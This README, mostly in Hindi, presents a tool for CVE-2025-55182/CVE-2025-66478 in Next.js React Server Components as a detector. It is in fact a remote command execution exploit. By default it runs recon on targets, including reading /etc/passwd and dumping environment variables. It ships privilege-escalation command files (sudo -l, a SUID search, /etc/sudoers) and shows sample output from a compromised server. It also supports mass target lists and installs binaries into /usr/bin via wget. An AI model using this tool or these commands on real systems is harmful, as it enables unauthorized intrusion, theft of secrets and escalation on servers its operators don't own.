
A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components.
React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में CVE-2025-55182 और CVE-2025-66478 का पता लगाने के लिए एक कमांड-लाइन टूल।
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
CVE-2025-55182 -d https://example.com
नोट: यदि कोई कमांड विकल्प प्रदान नहीं किया गया है, तो डिफ़ॉल्ट कमांड निष्पादित होते हैं।
टूल डिफ़ॉल्ट रूप से ये कमांड निष्पादित करता है:
cat /etc/os-release - OS जानकारीwhoami - वर्तमान उपयोगकर्ताpwd - वर्तमान कार्यशील निर्देशिकाid - उपयोगकर्ता ID और समूहuname -a - सिस्टम जानकारीhostname -I - नेटवर्क इंटरफ़ेसls -la - निर्देशिका सूचीcat /etc/passwd - उपयोगकर्ता खातेenv - पर्यावरण चरps aux - चल रही प्रक्रियाएँreportgenerator टूल स्कैन परिणामों से स्वचालित रूप से पेशेवर भेद्यता प्रकटीकरण रिपोर्ट तैयार करता है।
# लक्ष्य डोमेन के साथ एक फ़ाइल बनाएँ
echo -e "https://target1.com\nhttps://target2.com" > subs.txt
# रिपोर्ट जनरेटर चलाएँ
reportgenerator
| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|---|---|
--file | लक्ष्य डोमेन वाली इनपुट फ़ाइल | subs.txt |
--user | प्रकटीकरण अनुभाग के लिए शोधकर्ता का नाम | Bhagirath Saxena |
# डिफ़ॉल्ट सेटिंग्स का उपयोग करें (subs.txt, Bhagirath Saxena)
reportgenerator
# कस्टम लक्ष्य फ़ाइल का उपयोग करें
reportgenerator --file targets.txt
# कस्टम शोधकर्ता नाम का उपयोग करें
reportgenerator --user "John Doe"
# दोनों कस्टम विकल्पों का उपयोग करें
reportgenerator --file my-targets.txt --user "Jane Smith"
रिपोर्ट दो निर्देशिकाओं में उत्पन्न होती हैं:
textfile/ - कच्चा स्कैन आउटपुट (संख्या: 1.txt, 2.txt, आदि)mdfile/ - पेशेवर मार्कडाउन रिपोर्ट (संख्या: 1.md, 2.md, आदि)नोट: स्वचालित संख्यांकन सुविधा यह सुनिश्चित करती है कि मौजूदा रिपोर्ट कभी ओवरराइट न हों। नए स्कैन सबसे बड़ी मौजूदा संख्या से जारी रहते हैं।
प्रत्येक उत्पन्न रिपोर्ट में शामिल है:
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...
[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝
[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
commands/ निर्देशिका उदाहरण:विभिन्न परिदृश्यों के लिए नमूना कमांड फ़ाइलें बनाएँ:
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|
-d, --domain | लक्ष्य URL (यदि कोई प्रोटोकॉल नहीं है तो स्वचालित रूप से https:// जोड़ता है) | http://localhost:3000 |
-c, --command | निष्पादित करने के लिए एकल कमांड | - |
-m, --multiple | अर्धविराम द्वारा अलग किए गए एकाधिक कमांड | - |
-f, --file | कमांड वाली फ़ाइल (प्रति पंक्ति एक) | - |
-h, --help | सहायता संदेश दिखाएं | - |